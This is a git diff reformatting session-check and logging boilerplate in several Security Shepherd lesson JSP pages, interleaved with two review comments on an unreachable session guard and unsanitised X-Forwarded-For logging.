+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ */
- final String LEVEL_NAME = "Unvalidated Redirects and Forwards Lesson";
- final String LEVEL_HASH = "f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f";
+ final String LEVEL_NAME = "Unvalidated Redirects and Forwards Lesson";
+ final String LEVEL_HASH = "f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f";
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.unvalidated_redirects_forwards." + LEVEL_HASH, locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.question.unvalidated_redirects_forwards");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.unvalidated_redirects_forwards." + LEVEL_HASH, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.unvalidated_redirects_forwards");
- ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
- String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
- String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
- String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.defend.unvalidatedRedirectsAndForwards");
+ ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+ String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
+ String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+ String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.defend.unvalidatedRedirectsAndForwards");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtml(tokenCookie.getValue());
- String hex = (String) ses.getAttribute("userName");
- String tempId = new Integer(hex.getBytes().hashCode() + hex.substring(0, hex.length() / 2).hashCode()).toString();
- ses.setAttribute("tempId", tempId);
+ String csrfToken = Encode.forHtml(tokenCookie.getValue());
+ String hex = (String) ses.getAttribute("userName");
+ String tempId = new Integer(hex.getBytes().hashCode() + hex.substring(0, hex.length() / 2).hashCode()).toString();
+ ses.setAttribute("tempId", tempId);
%>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
-
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+ $("#showLesson").click(function(){
+ $('#showLesson').hide("fast", function(){
+ $("#lessonIntro").show("slow");
+ });
+ });
+
+ <% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+ <% } %>
<%
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
+ }
+ else
+ {
+ response.sendRedirect("../loggedOutSheep.html");
+ }
+}
+else
+{
+ response.sendRedirect("../loggedOutSheep.html");
+}
%>
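Review bot: The outer guard `if (request.getSession() != null)` on the new side can never be false, because `HttpServletRequest.getSession()` creates a session when none exists. The final `else { response.sendRedirect("../loggedOutSheep.html"); }` is therefore unreachable, and the only effective gate is `Validate.validateSession(ses) && tokenCookie != null`. I would write `HttpSession ses = request.getSession(false);` and test `if (ses != null)`, which keeps the redirect reachable and stops anonymous requests from allocating sessions. `Validate.validateLanguage(request.getSession())` earlier in the scriptlet also creates a session and would need the same change; how it handles a null session is not visible here. The same guard appears in the Client Side Injection, Insecure Direct Object References, Security Misconfiguration and Insecure Crypto scriptlets further down this diff.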
diff --git a/src/main/webapp/lessons/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.jsp b/src/main/webapp/lessons/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.jsp
index 3ac198a62..ec38061c9 100644
--- a/src/main/webapp/lessons/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.jsp
+++ b/src/main/webapp/lessons/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.jsp
@@ -1,120 +1,127 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+ language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
<%
- //No Quotes In level Name
- String levelName = "Client Side Injection Lesson";
- //Alphanumeric Only
- String levelHash = "f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1";
+ //No Quotes In level Name
+ String levelName = "Client Side Injection Lesson";
+ //Alphanumeric Only
+ String levelHash = "f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1";
+
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_client_side_injection." + levelHash, locale);
+ ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.csi");
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_client_side_injection." + levelHash, locale);
- ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.question.csi");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-
- /*
- *
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Sean Duggan
- */
+ /*
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Sean Duggan
+ */
%>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
+ /**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
- final String LEVEL_NAME = "Insecure Direct Object References Lesson";
- final String LEVEL_HASH = "fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100";
+ final String LEVEL_NAME = "Insecure Direct Object References Lesson";
+ final String LEVEL_HASH = "fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100";
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.insecure_direct_object_ref." + LEVEL_HASH, locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.quesetion.insecure_direct_object_ref");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.insecure_direct_object_ref." + LEVEL_HASH, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.quesetion.insecure_direct_object_ref");
- ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
- String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
- String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
- String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.insecureDirectObjectReferences");
+ ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+ String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
+ String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+ String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.insecureDirectObjectReferences");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-%>
+ %>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
+ /**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
- final String LEVEL_NAME = "Security Misconfiguration";
- final String LEVEL_HASH = "fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833";
+ final String LEVEL_NAME = "Security Misconfiguration";
+ final String LEVEL_HASH = "fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833";
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.security_misconfig." + LEVEL_HASH, locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.question.security_misconfig");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.security_misconfig." + LEVEL_HASH, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.security_misconfig");
- ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
- String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
- String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
- String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.securityMisconfiguration");
+ ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+ String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
+ String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+ String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.securityMisconfiguration");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-%>
+ %>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
+ /**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
- final String LEVEL_NAME = "Insecure Crypto Lesson";
- final String LEVEL_HASH = "if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2";
+ final String LEVEL_NAME = "Insecure Crypto Lesson";
+ final String LEVEL_HASH = "if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2";
- //Translation stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.insecure_crypto." + LEVEL_HASH, locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.question.insecure_crypto");
+ //Translation stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.insecure_crypto." + LEVEL_HASH, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.insecure_crypto");
- ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
- String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
- String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
- String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.top10.insecureCryptoStorage");
+ ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+ String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
+ String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+ String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.top10.insecureCryptoStorage");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-%>
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ %>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- * @author Sean Duggan
- *
- */
-
-
+/**
+ * Template Servlet for Mobile Levels
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ * @author Sean Duggan
+ *
+ */
+
+
+
%>
\ No newline at end of file
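Review bot: The `ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed")` call at the top of the scriptlet runs before any session validation and passes a client-supplied header straight to the logger. Whether `logEvent` neutralises CR/LF is not visible in this diff; if it does not, the log can carry attacker-shaped lines, and the header is only meaningful as a source address when a trusted proxy sets it. I would either sanitise the value at the call site or add the comment `// X-Forwarded-For is client-controlled: must be CR/LF-neutralised before logging and is not a trusted source address` above the call. The same call opens the other lesson scriptlets in this span, whose file headers are missing from the page.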
diff --git a/src/main/webapp/lessons/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.jsp b/src/main/webapp/lessons/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.jsp
index 9e079a470..b25f19658 100644
--- a/src/main/webapp/lessons/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.jsp
+++ b/src/main/webapp/lessons/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.jsp
@@ -1,126 +1,133 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+ language="java"
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
<%
- /**
- *
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
+ /**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
- final String LEVEL_NAME = "Failure to Restrict URL Access Lesson";
- final String LEVEL_HASH = "oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3";
+ final String LEVEL_NAME = "Failure to Restrict URL Access Lesson";
+ final String LEVEL_HASH = "oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3";
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.failure_to_restrict_url_access." + LEVEL_HASH, locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.question.fail_restrict_url_acc");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.failure_to_restrict_url_access." + LEVEL_HASH, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.fail_restrict_url_acc");
- ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
- String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
- String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
- String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.top10.failureToRestrictUrlAccess");
+ ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+ String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
